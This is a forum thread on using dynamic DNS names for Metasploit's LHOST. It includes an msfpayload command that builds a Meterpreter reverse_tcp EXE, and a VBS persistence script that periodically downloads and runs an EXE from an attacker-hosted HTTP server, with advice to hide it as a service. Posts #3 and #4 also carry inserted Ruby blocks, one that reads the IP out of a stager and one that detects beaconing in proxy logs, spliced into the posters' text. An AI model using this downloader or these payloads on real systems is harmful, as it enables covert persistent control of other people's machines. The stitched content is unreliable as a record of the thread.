
Thread: Metasploit: is it possible to use DNS or NETBIOS names for LHOST?

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Metasploit: is it possible to use DNS or NETBIOS names for LHOST?

    When setting a DNS name "e.g. pentester.dyndns.org" or NetBIOS name "e.g. pentester-pc" as the LHOST, it doesn't work:
    Code:
    msf exploit(adobe_media_newplayer) > set LHOST penteseter.dyndns.org
    LHOST => penteseter.dyndns.org
    msf exploit(adobe_media_newplayer) > exploit
    
    [-] Exploit failed: The following options failed to validate: LHOST.
    Is there a way to use anything other than IPs for LHOST?

    Thanks in advance.

  2. #2
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    5


    I am wondering the same. What do you do when you have a dynamic IP that can change daily? I hate going to sleep and waking up to finish what I was testing, just to find that my IP has changed and I have to reconfigure everything again.
    My exact situation is I have two computers, with one running Windows 7 and the other XP. I also have two different routers I am using for each computer. I am trying to use the new Adobe exploit to see if I can take over the Windows 7 machine by just opening a PDF on it. I have set up port forwarding on the XP machine to forward the connection to the handler on the XP machine. I would like to set up the exploit PDF to be able to keep being used even when my XP machine gets a new IP from the ISP's DNS, without having to keep making new ones.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    5


    It looked like it was working in the console when I tried it, but when I tried to make an EXE I got this.

    Code:
    $ msfpayload windows/meterpreter/reverse_tcp lhost=this.iswhere.ihadmy.notshowingyou.com lport=443 x>test.exe
    /msf3/lib/rex/socket.rb:160:in `gethostbyname': getaddrinfo: hostname nor servname provided, or not known (SocketError)
            from /msf3/lib/rex/socket.rb:160:in `gethostbyname'
            from /msf3/lib/rex/socket.rb:193:in `resolv_nbo'
            from /msf3/lib/msf/core/payload.rb:306:in `block in substitute_vars'
            from /msf3/lib/msf/core/payload.rb:285:in `each_pair'
            from /msf3/lib/msf/core/payload.rb:285:in `substitute_vars'
            from /msf3/lib/msf/core/payload.rb:545:in `internal_generate'
            from /msf3/lib/msf/core/payload.rb:262:in `generate'
            from /msf3/lib/msf/core/payload.rb:163:in `size'
            from /msf3/lib/msf/core/payload_set.rb:168:in `block (2 levels) in recalculate'
            from /msf3/lib/msf/core/payload_set.rb:113:in `each_pair'
            from /msf3/lib/msf/core/payload_set.rb:113:in `block in recalculate'
            from /msf3/lib/msf/core/payload_set.rb:109:in `each_pair'
            from /msf3/lib/msf/core/payload_set.rb:109:in `recalculate'
            from /msf3/lib/msf/core/module_manager.rb:866:in `block in load_modules'
            from /msf3/lib/msf/core/module_manager.rb:866:in `each_key'
            from /msf3/lib/msf/core/module_manager.rb:866:in `load_modules'
            from /msf3/lib/msf/core/module_manager.rb:632:in `add_module_path'
            from /msf3/lib/msf/base/simple/framework.rb:107:in `simplify'
            from /msf3/lib/msf/base/simple/framework.rb:70:in `create'
            from /msf3/msfpayload:36:in `<main>'
    I am wondering if it just pulls the DNS at creation time and still puts an IP in there, or if it actually will use the DNS at run time to get the IP.
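    The trace above ends in Rex::Socket.resolv_nbo, which resolves LHOST once and returns the address as four bytes in network byte order; that is what gets substituted into the payload. The following is an added example for this thread, not code from Metasploit: a small Ruby scanner that recovers the hard-coded address and port from an unencoded Windows x86 reverse_tcp stager. The byte pattern it matches (two PUSH imm32 instructions building a sockaddr_in: `68 <ip>` followed by `68 02 00 <port big-endian>`) is my assumption about the stager layout and is not stated in the thread; the sample bytes are constructed, not a real payload.

```ruby
# Added example, not Metasploit code. Recovers the LHOST/LPORT that an
# unencoded Windows x86 reverse_tcp stager carries. Metasploit resolves
# LHOST once, at generation time (Rex::Socket.resolv_nbo), and bakes the
# result in as a sockaddr_in built from two PUSH imm32 instructions:
#   68 a b c d        push <ip, network byte order>
#   68 02 00 hi lo    push AF_INET (0x0002) | port << 16, port big-endian
# Assumption: this is the stock stager layout; encoded payloads will not match.

# Same conversion resolv_nbo performs for a dotted quad: 4 bytes, network order.
def ip_to_nbo(ip)
  ip.split('.').map(&:to_i).pack('C4')
end

# Scan a byte string for the sockaddr_in push pair and return every
# {ip:, port:, offset:} found.
def extract_reverse_tcp_endpoints(blob)
  blob = blob.b
  hits = []
  i = 0
  while (i = blob.index("\x68".b, i))
    if blob.bytesize >= i + 10 && blob[i + 5, 3] == "\x68\x02\x00".b
      ip   = blob[i + 1, 4].unpack('C4').join('.')
      port = blob[i + 8, 2].unpack1('n') # 16-bit big-endian
      hits << { ip: ip, port: port, offset: i }
    end
    i += 1
  end
  hits
end

# Constructed sample (not a real stager): filler around the two pushes
# for 192.0.2.10:443, followed by "mov esi, esp" and more filler.
SAMPLE = [
  "\x90" * 16,
  "\x68", ip_to_nbo('192.0.2.10'),
  "\x68\x02\x00", [443].pack('n'),
  "\x89\xe6",
  "\xcc" * 8
].map(&:b).join

if __FILE__ == $PROGRAM_NAME
  extract_reverse_tcp_endpoints(SAMPLE).each do |h|
    puts format('offset %d: %s:%d', h[:offset], h[:ip], h[:port])
  end
end
```

    Because the address is fixed bytes inside the file, a dyndns name given at generation time only changes which IP gets baked in; the file never re-resolves anything later. Running the scanner over a stager you generated yourself is a quick way to confirm what it will connect back to.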

  4. #4
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    5


    According to this
    spool.metasploit.com/pipermail/framework/2009-September/009646.html
    Metasploit stores only an IP in the payload, not the raw URL. It resolves the DNS name at the time the exploit is created.
    My problem is, what if a payload needs to stay on a system where you can't get a new one onto it? Also, what if you need a reverse connection and the IP of the computer it connects to is not static? Without rewriting the payloads to resolve DNS names, here is my solution.
    It involves the target being a Windows system without restrictions on external connections. This is very visible in the logs of any IT admin who looks at the network, though. A very ugly way to do it, but it gets the job done.

    First off, I set up an HTTP file host with a dynamic DNS provider and placed an updated Meterpreter payload, encoded as a standalone EXE, that has the current IP set as the LHOST. This file can be changed as your LHOST IP changes.
    I then cobbled together this VBS script from several sources. It could use a lot of work, but it does the basic job for now.
    Code:
    ' Set your settings
    DURL = "file in url here as the forum made me change it"
    SLocation = "c:\c\update.exe"
    LCount = 50

    state = 1
    While state = 1
        ' Every 50 passes: stop the running copy and fetch a fresh one
        If LCount = 50 Then
            strComputer = "."
            Set objWMIService = GetObject("winmgmts:" _
                & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
            Set colProcessList = objWMIService.ExecQuery _
                ("SELECT * FROM Win32_Process WHERE Name = 'update.exe'")
            For Each objProcess In colProcessList
                objProcess.Terminate()
            Next
            Call FileFetch(DURL, SLocation)
            LCount = 0
        End If

        ' Start the downloaded file if it is not already running
        Set WshShell = WScript.CreateObject("WScript.Shell")
        Set colProcessList = GetObject("Winmgmts:").ExecQuery("Select * from Win32_Process")
        For Each objProcess In colProcessList
            If objProcess.name = "update.exe" Then
                vFound = True
            End If
        Next
        If vFound = True Then
            WScript.Sleep 5000
        Else
            WshShell.Run ("c:\c\update.exe")
            WScript.Sleep 500000
        End If
        vFound = False
        LCount = LCount + 1
    Wend

    Public Function FileFetch(strFileURL, strHDLocation)
        ' Fetch the file
        Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

        objXMLHTTP.open "GET", strFileURL, False
        objXMLHTTP.send()

        If objXMLHTTP.Status = 200 Then
            Set objADOStream = CreateObject("ADODB.Stream")
            objADOStream.Open
            objADOStream.Type = 1 'adTypeBinary

            objADOStream.Write objXMLHTTP.ResponseBody
            objADOStream.Position = 0 'Set the stream position to the start

            Set objFSO = CreateObject("Scripting.FileSystemObject")
            If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
            Set objFSO = Nothing

            objADOStream.SaveToFile strHDLocation
            objADOStream.Close
            Set objADOStream = Nothing
        End If

        Set objXMLHTTP = Nothing
    End Function
    As you can see, this will download an EXE shellcode from the HTTP site and run it.
    You would not want to use this as a normal access shell, since it will periodically kill it off and restart it, but you can use this to upload and spawn a new shell as needed for regular access. Every so often this will make a call out to you, so you just keep your handler open and wait for it when you want to reconnect to this computer.

    This could be improved by changing the script to check another file, also served with a version number, and only killing off the shell and redownloading and spawning a new one when the HTTP file host shows a bigger version number than the current one.
    You can stuff this into an EXE and set it as a service to hide it from the user if you want, also.
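    The poster notes that this loop is "very visible in the logs of any IT admin who looks at the network": the same client fetches the same .exe from a dynamic DNS host over and over at a fixed cadence. As an added example for this thread (not the poster's code), here is a Ruby script that finds exactly that pattern in proxy logs. The log format (ISO timestamp, client IP, method, URL, status) and all log lines are constructed for the example; the dyndns.org suffix check is the one dynamic DNS provider the thread mentions, not a complete list.

```ruby
# Added example, not from the thread. Flags clients that repeatedly fetch
# the same executable at a regular interval, the beaconing pattern left by
# a download-and-rerun loop like the VBS script above.
require 'time'

# Constructed proxy log: "<iso-time> <client> <method> <url> <status>".
# The 10.0.0.12 entries fetch update.exe every 250 s; 10.0.0.33 fetches
# an installer twice, which is below the hit threshold.
SAMPLE_LOG = <<~LOG
  2010-01-20T08:00:00Z 10.0.0.12 GET http://pentester.dyndns.org/update.exe 200
  2010-01-20T08:00:03Z 10.0.0.12 GET http://intranet.example/news.html 200
  2010-01-20T08:04:10Z 10.0.0.12 GET http://pentester.dyndns.org/update.exe 200
  2010-01-20T08:08:20Z 10.0.0.12 GET http://pentester.dyndns.org/update.exe 200
  2010-01-20T08:12:30Z 10.0.0.12 GET http://pentester.dyndns.org/update.exe 200
  2010-01-20T09:00:00Z 10.0.0.33 GET http://vendor.example/setup.exe 200
  2010-01-20T09:30:00Z 10.0.0.33 GET http://vendor.example/setup.exe 200
LOG

Entry = Struct.new(:time, :client, :url)

def parse_log(text)
  text.each_line.map do |line|
    ts, client, _method, url, _status = line.split
    Entry.new(Time.iso8601(ts), client, url)
  end
end

# Dynamic DNS suffixes to call out; only the one named in the thread.
DYNAMIC_DNS_SUFFIXES = %w[.dyndns.org].freeze

def dynamic_dns?(url)
  host = url.sub(%r{\Ahttps?://}, '').split('/').first.to_s
  DYNAMIC_DNS_SUFFIXES.any? { |s| host.end_with?(s) }
end

# Report (client, url) pairs that fetch an .exe at least min_hits times with
# inter-request jitter below tolerance (fraction of the mean interval).
def find_exe_beacons(entries, min_hits: 3, tolerance: 0.2)
  exe = entries.select { |e| e.url =~ /\.exe\z/i }
  exe.group_by { |e| [e.client, e.url] }.each_with_object([]) do |((client, url), hits), out|
    next if hits.size < min_hits
    times = hits.map(&:time).sort
    gaps = times.each_cons(2).map { |a, b| b - a }
    mean = gaps.sum / gaps.size
    next if mean.zero?
    jitter = gaps.map { |g| (g - mean).abs }.max / mean
    next if jitter > tolerance
    out << { client: client, url: url, hits: hits.size,
             interval: mean.round, jitter: jitter.round(3),
             dynamic_dns: dynamic_dns?(url) }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_exe_beacons(parse_log(SAMPLE_LOG)).each do |b|
    puts format('%s -> %s: %d fetches every ~%ds (jitter %.3f, dyndns=%s)',
                b[:client], b[:url], b[:hits], b[:interval], b[:jitter], b[:dynamic_dns])
  end
end
```

    The 50-pass counter in the VBS loop gives the fetch a steady period, which is what the jitter test keys on; a one-off software download from a vendor site has no cadence and drops out. On a real proxy log you would widen the tolerance a little, since the loop's sleep only starts after the previous fetch returns.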

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    31


    Wow!
    Will give it a try...
    Thanks for the help..
